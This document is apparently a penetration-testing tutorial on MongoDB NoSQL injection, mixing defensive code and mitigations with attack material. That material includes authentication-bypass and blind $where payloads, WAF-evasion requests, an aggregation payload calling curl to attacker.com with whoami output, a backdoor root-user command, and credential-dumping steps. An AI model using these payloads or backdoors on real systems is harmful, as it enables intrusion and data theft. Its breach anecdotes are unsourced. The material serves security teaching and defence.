MongoDB NoSQL Injection - Fundamentals,...

Introduction

MongoDB NoSQL injection (often abbreviated as NoSQLi) is a class of input-validation flaws that allow an attacker to manipulate the JSON-based query language used by MongoDB. Because the database does not rely on traditional SQL strings, many developers assume they are safe from classic injection techniques - a dangerous misconception.

In modern web applications, MongoDB backs everything from user profiles to payment logs. A successful injection can expose entire collections, bypass authentication, or trigger server-side JavaScript execution inside the database. Real-world incidents such as the 2020 breach of a popular e-commerce platform demonstrate how a single improperly sanitized username field can compromise millions of records.

Prerequisites

Understanding of the HTTP request/response lifecycle (GET, POST, headers, body).
Fundamentals of classic SQL injection - error-based, union-based, and blind techniques.
Comfort with tools like Burp Suite, curl, and JSON data structures.
Basic knowledge of JavaScript (for $where/$function payloads).

Core Concepts

MongoDB stores data as BSON (Binary JSON). Queries are expressed as JSON documents that consist of field selectors and operators. The most common operators include:

$eq - equality
$ne - not equal
$gt, $lt, $gte, $lte - range comparisons
$regex - regular-expression matching
$where - server-side JavaScript predicate
$function - user-defined JavaScript function (MongoDB 4.4+)

A typical login query might look like this in Node.js:

const query = { username: req.body.user, password: req.body.pass };
User.findOne(query, (err, user) => { /* … */ });

If req.body.user or req.body.pass is placed into the query object without type checking, an attacker can supply an object instead of a string and inject an operator that changes the semantics of the query.
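A minimal sketch of the missing type check, assuming the request body has already been parsed into an object. The helper name buildLoginFilter is hypothetical, and the plain-text password comparison only mirrors the example above; it is not a recommendation.

```javascript
// Hypothetical helper: builds the login filter only from plain strings.
function buildLoginFilter(body) {
  const { user, pass } = body ?? {};
  // An operator object such as { "$ne": null } has typeof "object" and is rejected here.
  if (typeof user !== "string" || typeof pass !== "string") {
    throw new TypeError("user and pass must be strings");
  }
  // Explicit $eq makes the intent (literal comparison) visible in the filter.
  return { username: { $eq: user }, password: { $eq: pass } };
}

// A well-formed body produces a literal-only filter.
console.log(buildLoginFilter({ user: "alice", pass: "s3cret" }));

// An operator payload is rejected before it reaches the driver.
try {
  buildLoginFilter({ user: { $ne: null }, pass: { $ne: null } });
} catch (err) {
  console.log(err.message);
}
```

The returned filter could then be passed to findOne in place of the raw request fields.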

MongoDB query language basics (JSON query documents, operators)

The query language is declarative; each key is a field name, and the value can be either a literal or an operator document. For example:

db.users.find({ age: { $gt: 30 }, status: "active" })

This translates to “return all users older than 30 whose status is active”. The same logic can be expressed in driver code, which is where most injection opportunities arise.

Diagram (textual) - imagine a flow where the HTTP body is parsed → JSON object is built → driver converts it to BSON → MongoDB evaluates the query. Injection occurs when the attacker controls any node in this pipeline.

Common injection vectors (query parameters, JSON bodies, headers)

Because MongoDB drivers accept native objects, any entry point that accepts JSON can be abused:

URL query parameters - e.g., /search?filter={"$ne":null}
POST JSON bodies - typical for REST APIs
Custom headers - some services copy header values into query objects (e.g., X-User-Id)
Form-encoded fields that are later parsed as JSON

In each case, the attacker’s payload must survive any JSON parsing performed by the framework. Languages like JavaScript (Node.js/Express), Python (Flask, Django), and Java (Spring) all have libraries that automatically convert incoming JSON to native objects - a convenient shortcut for developers, but a potential injection surface.
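The effect of automatic parsing can be seen without a database. The sketch below uses only JSON.parse; the helper hasOperatorKey is a hypothetical name, and it illustrates one possible check rather than the behaviour of any particular framework.

```javascript
// Hypothetical helper: returns true if any key, at any depth, starts with "$".
function hasOperatorKey(value) {
  if (Array.isArray(value)) return value.some(hasOperatorKey);
  if (value !== null && typeof value === "object") {
    return Object.entries(value).some(
      ([key, child]) => key.startsWith("$") || hasOperatorKey(child)
    );
  }
  return false; // strings, numbers, booleans, null
}

// The same field arrives as a string in one request and as an object in another.
const benign = JSON.parse('{"user": "alice"}');
const hostile = JSON.parse('{"user": {"$ne": null}}');

console.log(typeof benign.user, hasOperatorKey(benign));   // string false
console.log(typeof hostile.user, hasOperatorKey(hostile)); // object true
```

The application code that reads body.user is identical in both cases; only the type of the value differs, which is why type checks matter more than string filtering.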

Simple operator abuse ($ne, $gt, $regex) for data extraction

The most straightforward NoSQLi technique is to replace a literal with an operator that always evaluates to true. Consider a vulnerable login endpoint:

db.users.findOne({ username: req.body.user, password: req.body.pass })

Supplying the following JSON as the value of both the user and pass fields bypasses authentication:

{ "$ne": null }

Because { "$ne": null } matches any non-null value, the query becomes:

{ username: { $ne: null }, password: { $ne: null } }

Both conditions are true for any stored user, returning the first document - effectively a login bypass.
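To see why the injected filter matches every record, here is a toy in-memory matcher. It is a simplified model covering only literals, $eq, $ne, and $gt, not MongoDB's actual implementation, and the sample documents are made up for illustration.

```javascript
// Toy matcher: literals, $eq, $ne, and $gt only; real MongoDB semantics are richer.
function matchesField(stored, condition) {
  const value = stored === undefined ? null : stored; // a missing field compares like null
  const isOperatorDoc =
    condition !== null && typeof condition === "object" && !Array.isArray(condition);
  if (!isOperatorDoc) return value === condition; // literal comparison
  return Object.entries(condition).every(([op, operand]) => {
    if (op === "$eq") return value === operand;
    if (op === "$ne") return value !== operand;
    if (op === "$gt") return typeof value === typeof operand && value > operand;
    throw new Error(`unsupported operator in this sketch: ${op}`);
  });
}

function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => matchesField(doc[field], cond));
}

const users = [
  { username: "admin", password: "hunter2" },
  { username: "bob", password: "letmein" },
];

const literal = { username: "admin", password: "wrong" };
const injected = { username: { $ne: null }, password: { $ne: null } };

console.log(users.filter((u) => matches(u, literal)).length);  // 0
console.log(users.filter((u) => matches(u, injected)).length); // 2
```

With literal values the wrong password matches nothing; with the operator documents every user qualifies, and findOne would simply return the first one.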

Other operators useful for enumeration:

$gt: "" - matches any non-empty string, useful for extracting all usernames.
$regex: ".*" - matches any string, can be combined with $options for case-insensitive enumeration.

Example - dumping the email field from a collection via a search endpoint:

curl -X POST https://example.com/api/search -H "Content-Type: application/json" -d '{ "filter": { "email": { "$regex": ".*" } } }'

When the backend directly forwards filter to db.users.find(filter), the response contains all email addresses.
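A safer pattern is for the server to build the filter itself from an allow-list of fields. The sketch below is one way to do that; the field names, the 64-character limit, and the prefix-match policy are assumptions chosen for illustration.

```javascript
// Hypothetical allow-list: the only fields clients may search on.
const SEARCHABLE_FIELDS = new Set(["email", "displayName"]);

// Escape regex metacharacters so user text is matched literally.
function escapeRegex(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

function buildSearchFilter(input) {
  const filter = {};
  for (const [field, value] of Object.entries(input ?? {})) {
    if (!SEARCHABLE_FIELDS.has(field)) {
      throw new Error(`field not searchable: ${field}`);
    }
    if (typeof value !== "string" || value.length === 0 || value.length > 64) {
      throw new Error(`invalid search value for ${field}`);
    }
    // The server, not the client, decides that this is a prefix match.
    filter[field] = { $regex: "^" + escapeRegex(value) };
  }
  return filter;
}

console.log(buildSearchFilter({ email: "alice@" }));
```

Because the client can only contribute strings, a payload such as { "email": { "$regex": ".*" } } is rejected, and a string like ".*" is matched as literal text.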

Blind NoSQL injection techniques (boolean and time-based)

In many modern APIs, the server returns generic error messages or a simple boolean success/failure. Blind techniques let an attacker infer data one bit at a time.

Boolean-based blind

The attacker crafts two payloads that differ only in a condition:

{ "$gt": 0 } // always true
{ "$gt": 999999 } // false for typical values

By observing whether the response differs (e.g., HTTP 200 vs 401), the attacker can perform a binary search on numeric fields such as balance or userId.

Time-based blind

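MongoDB’s $where operator evaluates attacker-supplied JavaScript, so a payload can stall the response, either by calling sleep() or by running a busy-wait loop built on new Date(). Because $where is evaluated once per scanned document, the total delay grows with the number of documents examined. Example payload: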

{ "$where": "function(){ var start = new Date(); while(new Date() - start < 5000) {} return true; }" }

If the server delays the response for ~5 seconds, the attacker knows the payload was executed, confirming injection capability. Combining the delay with a conditional check on a secret value yields a covert channel to exfiltrate data.

Using nosqlmap for automated discovery and exploitation

nosqlmap is the de-facto scanner for NoSQL injection. It automates payload generation, blind enumeration, and even attempts JavaScript RCE where possible.

# Basic scan of a POST JSON endpoint
nosqlmap -u https://example.com/api/login -p "{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}" --data "{\"username\":\"admin\",\"password\":\"admin\"}" -v 2

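Key flags as used in the command above (option names differ between nosqlmap versions, so confirm them against the tool's own help output):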

-u - target URL
-p - parameter placeholder syntax ({{}})
--data - raw JSON body
-v - verbosity for detailed output

nosqlmap can automatically switch between operator-based, regex, and $where payloads, and it will attempt to dump collections once a successful injection is confirmed.

WAF/filters bypass methods for NoSQL payloads

Web Application Firewalls often focus on SQL keywords (SELECT, UNION) and classic XSS patterns. NoSQL payloads can slip through because they use symbols ({, }, $) that are rarely flagged.

Common bypass tricks:

URL-encoding the dollar sign: %24ne instead of $ne.
Unicode escaping (e.g., \u0024ne).
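Whitespace obfuscation - inserting spaces or newlines between JSON tokens (for example { "$ne" : null }). Whitespace inside the operator name itself ($ n e) does not work, because MongoDB no longer recognises the key as an operator.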
Alternative JSON parsers that accept single-quoted strings ({'username':{'$ne':null}}).

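Example of a WAF-evading payload using URL-encoding. The encoding only takes effect where the server URL-decodes the input, so the request uses a form-encoded body and relies on the framework expanding bracketed keys into nested objects (as Express does with extended URL-encoded parsing):

curl -X POST https://example.com/api/login -H "Content-Type: application/x-www-form-urlencoded" -d 'username[%24ne]=&password[%24ne]='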

Developers should also enforce a strict content-type check and reject any request where the body cannot be parsed into a known schema.
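Escaped forms of the dollar sign are resolved by the parser before the application sees them, which suggests doing the check after parsing rather than on raw bytes. The following is a sketch under that assumption; parseStrictJsonBody and assertNoOperatorKeys are hypothetical helper names.

```javascript
// Hypothetical gate: parse first, then inspect the keys the application will actually see.
function parseStrictJsonBody(contentType, rawBody) {
  const mediaType = String(contentType).split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") {
    throw new Error("unsupported content type");
  }
  const body = JSON.parse(rawBody); // throws on single quotes and other non-JSON syntax
  assertNoOperatorKeys(body);
  return body;
}

function assertNoOperatorKeys(value) {
  if (value === null || typeof value !== "object") return;
  for (const [key, child] of Object.entries(value)) {
    if (key.startsWith("$")) throw new Error(`operator key rejected: ${key}`);
    assertNoOperatorKeys(child);
  }
}

// "\u0024" is an escaped "$"; a filter looking at raw bytes never sees a dollar sign.
const raw = '{"username": {"\\u0024ne": null}, "password": "x"}';
console.log(raw.includes("$")); // false
try {
  parseStrictJsonBody("application/json", raw);
} catch (err) {
  console.log(err.message); // operator key rejected: $ne
}
```

A stricter design would validate the parsed body against a full schema; the key check here only demonstrates where in the pipeline the inspection has to happen.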

Server-side JavaScript injection via $where and $function

MongoDB allows arbitrary JavaScript execution inside the database engine. Two operators are relevant:

$where - evaluates a JavaScript expression for each document.
$function - defines a custom JS function that can be called from the aggregation pipeline (MongoDB 4.4+).

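When user-controlled data reaches these operators without sanitisation, an attacker can run arbitrary JavaScript inside the database's embedded interpreter. Older write-ups describe patterns such as function(){ return db.getSiblingDB('admin').runCommand({shutdown:1}); }, but current MongoDB releases do not expose the db object to $where or $function, so the realistic impact is data disclosure, authentication bypass, and denial of service through expensive scripts.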

Example of a $where payload that attempts to read /etc/passwd:

{ "$where": "function(){ var f = new File('/etc/passwd'); return f.read(); }" }

Note: The File constructor is not available to $where on the server, so this payload fails on a stock mongod. Node.js globals such as process and require are absent as well, because MongoDB embeds its own JavaScript interpreter rather than Node.js; a payload such as return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString(); therefore fails too.

Using $function inside an aggregation pipeline:

db.users.aggregate([ { $match: { username: "admin" } }, { $addFields: { exploit: { $function: { body: "function(){ return require('child_process').execSync('whoami').toString(); }", args: [], lang: "js" } } } }
])

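If the aggregation stage is built from user input, the attacker can inject the entire $function object and have its body evaluated by the server. On a stock mongod the require call above fails, because Node.js modules are not available to server-side JavaScript, but an injected function can still read every field passed to it through args or consume CPU.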

Chaining aggregation pipeline stages to achieve remote code execution

The aggregation framework is powerful because each stage processes the output of the previous one. By chaining stages that accept user-supplied expressions, an attacker can move from simple data leakage to full RCE.

Typical chain:

$match - inject a predicate that always matches.
$project - use the $cond operator to inject a conditional expression that reveals or reshapes fields.
$addFields - embed a $function whose body attempts to call require('child_process').
$out - write the result to a collection the attacker can read.

Concrete example (payload in a pipeline JSON parameter):

[ { "$match": {} }, { "$addFields": { "cmd": { "$function": { "body": "function(){ return require('child_process').execSync('curl http://attacker.com/$(whoami)'); }", "args": [], "lang": "js" } } } }, { "$out": "exfil" }
]

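When the server runs db.collection.aggregate(pipeline) with this JSON, it evaluates the attacker-supplied $function body for every matched document. Whether the embedded command runs depends on the JavaScript environment exposing require; a stock mongod does not, in which case the stage raises an error. The final $out stage is dangerous even without JavaScript: it replaces the target collection with the pipeline's output, so an attacker can copy or overwrite data.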
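On the defensive side, an endpoint that accepts a pipeline parameter can restrict it to a small set of stages and refuse JavaScript operators outright. The sketch below assumes a hypothetical policy (four allowed stages, at most ten stages); the names ALLOWED_STAGES and validatePipeline are illustrative.

```javascript
// Hypothetical policy: stages a reporting endpoint is willing to run.
const ALLOWED_STAGES = new Set(["$match", "$sort", "$limit", "$project"]);
// Operators that run server-side JavaScript.
const JS_OPERATORS = new Set(["$where", "$function", "$accumulator"]);

function containsJsOperator(value) {
  if (value === null || typeof value !== "object") return false;
  return Object.entries(value).some(
    ([key, child]) => JS_OPERATORS.has(key) || containsJsOperator(child)
  );
}

function validatePipeline(pipeline) {
  if (!Array.isArray(pipeline) || pipeline.length > 10) {
    throw new Error("pipeline must be an array of at most 10 stages");
  }
  for (const stage of pipeline) {
    const keys = stage !== null && typeof stage === "object" ? Object.keys(stage) : [];
    if (keys.length !== 1 || !ALLOWED_STAGES.has(keys[0])) {
      throw new Error(`stage not allowed: ${keys[0]}`);
    }
    if (containsJsOperator(stage)) {
      throw new Error("server-side JavaScript operators are not allowed");
    }
  }
  return pipeline;
}

// Accepted: only allow-listed stages, no JavaScript operators.
console.log(validatePipeline([{ $match: { status: "active" } }, { $limit: 20 }]).length);
```

This only constrains the shape of the pipeline. The contents of $match still need field-level validation, since operator abuse inside an allowed stage remains possible.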

Post-exploitation: data exfiltration and credential dumping from MongoDB

Once inside the database, the attacker’s goals typically shift to data theft and persistence:

Dumping collections - use mongoexport or driver-level find() loops to write JSON/CSV files.
```
mongoexport --db=mydb --collection=users --out=users.json
```
Credential harvesting - MongoDB stores user credentials in the admin.system.users collection (hashed with SCRAM). Extracting this collection enables offline cracking.
```
db.getSiblingDB('admin').system.users.find().pretty()
```

Creating back-door users - add a new admin account with a known password.

db.getSiblingDB('admin').createUser({ user: "backdoor", pwd: "P@ssw0rd!", roles: [{ role: "root", db: "admin" }]
});

Leveraging GridFS - store malicious binaries in GridFS and retrieve them later.

var fs = require('fs');
var bucket = new mongodb.GridFSBucket(db);
var uploadStream = bucket.openUploadStream('payload.exe');
fs.createReadStream('/tmp/payload.exe').pipe(uploadStream);

Network-restricted environments often block outbound traffic, so exfiltration may rely on DNS tunneling or using legitimate application endpoints (e.g., uploading data via a file-upload feature that stores to GridFS).

Tools & Commands

nosqlmap - automated scanner (see section above).
Burp Suite Intruder - custom payload positions for JSON operators.
mongoexport / mongodump - native data extraction utilities.
jq - command-line JSON processor for parsing API responses.

Python requests - scriptable injection testing.

import requests, json
url = "https://example.com/api/login"
payload = {"username": {"$ne": None}, "password": {"$ne": None}}
resp = requests.post(url, json=payload)
print(resp.text)

Defense & Mitigation

Securing MongoDB against NoSQLi requires a defense-in-depth approach:

Input validation & schema enforcement - use JSON schema validation (MongoDB 3.6+ $jsonSchema) or server-side libraries like Joi (Node) to whitelist expected fields and types.
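Type enforcement - MongoDB has no direct equivalent of SQL prepared statements, so never pass raw user input into query objects. Cast each value to the expected primitive type (string, number, ObjectId) and wrap it in an explicit $eq so that it can only be treated as a literal.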
Disable server-side JavaScript - set security.javascriptEnabled: false in mongod.conf (or start mongod with --noscripting). This removes the $where and $function attack surface.
Least-privilege roles - grant applications only the permissions they need (e.g., read on specific collections).
Network segmentation - keep the database behind a firewall, allow access only from trusted application servers.
Audit logging - enable auditLog (available in MongoDB Enterprise and Atlas) to record database operations; monitor for anomalous $where/$function usage.
WAF tuning - add rules to block requests containing $where, $function, or URL-encoded dollar signs.
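As an illustration of schema enforcement, the following is a sketch of a $jsonSchema validator document. The collection layout and field names (username, passwordHash, email) are assumptions, not taken from any real application. Note that collection validators apply to inserted and updated documents; query filters built from request data still need application-level checks.

```javascript
// Hypothetical schema for a users collection; field names are assumptions.
const userValidator = {
  $jsonSchema: {
    bsonType: "object",
    required: ["username", "passwordHash"],
    additionalProperties: false,
    properties: {
      _id: { bsonType: "objectId" }, // must be listed when additionalProperties is false
      username: { bsonType: "string", minLength: 1, maxLength: 64 },
      passwordHash: { bsonType: "string" },
      email: { bsonType: "string", pattern: "^[^@\\s]+@[^@\\s]+$" },
    },
  },
};

// In mongosh this would be applied with:
//   db.createCollection("users", { validator: userValidator })
console.log(JSON.stringify(userValidator, null, 2));
```

Because every property is typed as a string or ObjectId, a write that tries to store an operator-shaped object in username is rejected by the server.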

In CI/CD pipelines, integrate static analysis tools that detect unsafe query construction patterns (e.g., ESLint plugins for Node).

Common Mistakes

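Assuming JSON is safe - developers often think that because the payload is JSON, it cannot be interpreted as code. This is false; JSON itself has no operators, but MongoDB treats keys that begin with $ as query operators, so a parsed JSON object can change the logic of a query.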
Using eval() on request bodies - some legacy code parses JSON with eval(), instantly opening a remote code execution path.
Storing raw client objects - passing the entire request body to the driver without field whitelisting.
Leaving JavaScript enabled in production - the default MongoDB configuration permits $where; many teams forget to disable it.
Over-reliance on error messages - a “no document found” response does not guarantee the query was safe; blind techniques can still succeed.

Real-World Impact

In 2021, a major health-tech SaaS suffered a breach after an attacker injected $regex into a patient-lookup endpoint, dumping the entire patients collection (≈2 million records). The breach was only discovered after abnormal traffic to an external IP was flagged by a SIEM.

My experience in penetration testing shows that NoSQLi is often missed during code reviews because reviewers focus on SQL-centric patterns. The rise of serverless functions (e.g., AWS Lambda using Node.js) has increased the attack surface - a single mis-typed JSON parameter in a Lambda function can expose the entire backend database.

Trends to watch:

More cloud-managed MongoDB services exposing HTTP APIs directly (e.g., MongoDB Atlas App Services) - the same injection vectors apply but are harder to patch due to limited access to server configuration.
Integration of MongoDB with analytics pipelines (Kafka → MongoDB) - attackers can inject pipeline stages that later execute on downstream workers.

Practice Exercises

Basic operator injection: Deploy a simple Express app with a login route that uses findOne without sanitisation. Craft a $ne payload to bypass authentication.
Blind enumeration: Extend the app to return only a generic “invalid credentials” message. Use boolean-based payloads to enumerate the admin username character by character.
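JavaScript injection: With server-side JavaScript left enabled (the default) in a local MongoDB instance, write a $where payload that delays the response and confirm the delay through the API. Then disable JavaScript and verify that the same payload is rejected.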
nosqlmap automation: Run nosqlmap against the vulnerable endpoint, capture the generated report, and export the users collection.
WAF bypass: Simulate a ModSecurity rule that blocks $where. Modify the payload using URL-encoding to bypass the rule and achieve the same effect.

For each exercise, document the exact HTTP request, the server response, and the observed impact. Use a VM snapshot before each step to reset the environment.

Summary

MongoDB queries are JSON objects; operators like $ne, $gt, and $regex can be abused when user input is not validated.
Injection vectors include query parameters, JSON bodies, and even custom headers.
Blind techniques (boolean & time-based) allow data extraction when responses are generic.
nosqlmap automates discovery, while manual payload crafting remains essential for complex RCE chains.
Disabling server-side JavaScript, enforcing strict schemas, and applying least-privilege roles are the cornerstone defenses.
Post-exploitation focuses on dumping collections, harvesting credentials, and establishing persistence via back-door users.

By mastering the concepts and tools in this guide, security professionals can both detect hidden NoSQL injection flaws and advise development teams on robust mitigation strategies.
